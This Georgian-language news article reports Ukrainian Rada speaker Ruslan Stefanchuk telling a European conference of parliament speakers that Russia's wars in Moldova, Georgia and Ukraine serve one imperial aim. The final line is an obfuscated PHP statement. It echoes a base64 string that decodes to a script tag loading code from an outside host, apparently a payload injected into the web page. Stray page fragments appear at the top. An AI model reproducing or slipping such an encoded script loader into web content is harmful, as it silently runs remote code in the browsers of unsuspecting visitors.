celsiusi
ავერსი შნაიდერი

ომი არ დაწყებულა გასული წლის 24 თებერვალს უკრაინაში რუსეთის ფართომასშტაბიანი ინტერვენციით, ის არც 2014 წელს დაწყებულა, გავიხსენოთ მოლდოვა, საქართველო, გავაანალიზოთ ყველა არასტაბილურობა, პროვოკაცია იმ ქვეყნებში, რომლებმაც მოსკოვისგან დამოუკიდებლობა გამოაცხადეს, – ამის შესახებ უკრაინის რადას სპიკერმა, რუსლან სტეფანჩუკმა ევროპის საბჭოს საპარლამენტო ასამბლეის წევრი ქვეყნების პარლამენტების თავმჯდომარეების ევროპულ კონფერენციაზე განაცხადა, სადაც საქართველოს პარლამენტის თავმჯდომარე შალვა პაპუაშვილიც მონაწილეობს.

სტეფანჩუკის თქმით, ყველა ეს ომი ერთი ბუნებისაა და მიზანია, კრემლმა ნებისმიერ ფასად აღადგინოს ყოფილი იმპერია.

„ჩემთვის პატივია, ვისაუბრო იმ ქვეყნების პარლამენტების წარმომადგენლების წინაშე, რომლებმაც აირჩიეს კანონის უზენაესობა, დემოკრატია და ადამიანის უფლებები თავიანთ ღირებულებად. თითქმის 75 წელია, ევროპის საბჭო აერთიანებს ევროპის კონტინენტის ქვეყნებს თავისი ბანერის ქვეშ. ჩვენ გულწრფელად ვოცნებობდით, რომ ეს ბანერი მალე გააერთიანებდა ყველა ევროპულ ქვეყანას, თუმცა ომი შემოიჭრა ჩვენს საერთო ევროპულ სახლში. ის არ დაწყებულა გასული წლის 24 თებერვალს უკრაინაში რუსეთის ფართომასშტაბური ინტერვენციით, ის არც 2014 წელს დაწყებულა, როდესაც უკრაინის ყირიმის და დონბასის ოკუპაცია მოხდა. მოდით, გავიხსენოთ მოლდოვა, საქართველო. მოდით, გავაანალიზოთ ყველა არასტაბილურობა, კონფრონტაცია, პროვოკაცია იმ ქვეყნებში, რომლებმაც მოსკოვისგან დამოუკიდებლობა გამოაცხადეს, მოდით, განვიხილოთ თითქმის 10-წლიანი ომი უკრაინაში. ყველა ეს ომი, მთელი ეს ბოროტება ერთი ბუნებისაა და მათი ინიციატორები მისდევენ ერთ მიზანს – ეს არის კრემლის რეჟიმის პათოლოგიური სურვილი, ნებისმიერ ფასად აღადგინოს ყოფილი იმპერია. ამას შეიძლება მრავალი სახელი ეწოდოს – რუსული მსოფლიო, საბაჟო კავშირი თუ ევრაზიული კავშირი, თუმცა უცვლელი რჩება არსი, ეს არის იმპერიული დიქტატურა, რომელმაც გადმოიბარა ტერორის, შოვინიზმისა და საყოველთაოდ მიღებული ღირებულებების უპატივცემულობის ყველაზე საშინელი პრაქტიკა. სხვა სიტყვით რომ ვთქვათ, მან მემკვიდრეობით მიიღო ყველაფერი, რაც თანამედროვე ცივილიზებულ მსოფლიოს ეგონა, რომ მოიშორა, როდესაც მეორე მსოფლიო ომის შემდეგ მშვიდობის ახალი არქიტექტურა შექმნა“, – განაცხადა რუსლან სტეფანჩუკმა.

სტეფანჩუკის განმარტებით, დემოკრატიული მსოფლიო დიდი ხნის განმავლობაში თვალს ხუჭავდა ამ იპერიალისტურ პოლიტიკაზე.

„უკრაინელი ხალხის მკვლელებთან ვაჭრობიდან მიღებული შემოსავალი, აგრესორის წინაშე ყველა სახის დათმობა და მტკიცედ მოქმედების სურვილის არქონა – ყველაფერმა ამან საბოლოოდ გამოიწვია დღევანდელი რეალობა. ძვირფასო მეგობრებო, ეს იყო შეცდომა. როდესაც 2022 წლის 24 თებერვალს უკრაინელები გააღვიძა სარაკეტო დარტყმებმა, ევროპელები გამოფხიზლდნენ ამ შეცდომების გაცნობიერებით. ჩვენი თავისუფლებისთვის საშინელი საფასურის მიუხედავად, მოხარული ვარ, რომ თავისუფალი მსოფლიო საბოლოოდ გამოფხიზლდა და ვიმედოვნებ, რომ ის აღარასდროს დაიძინებს გულგრილობის, უპასუხისმგებლობისა და დაღლილობის ამ ბურუსში“, – განაცხადა რუსლან სტეფანჩუკმა.

ამასთან, რუსლან სტეფანჩუკმა ღონისძიების ყველა მონაწილე მიიწვია, მონაწილეობა მიიღონ საპარლამენტო დონეზე უკრაინის მშვიდობის ფორმულის განხორციელებაში.

560
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");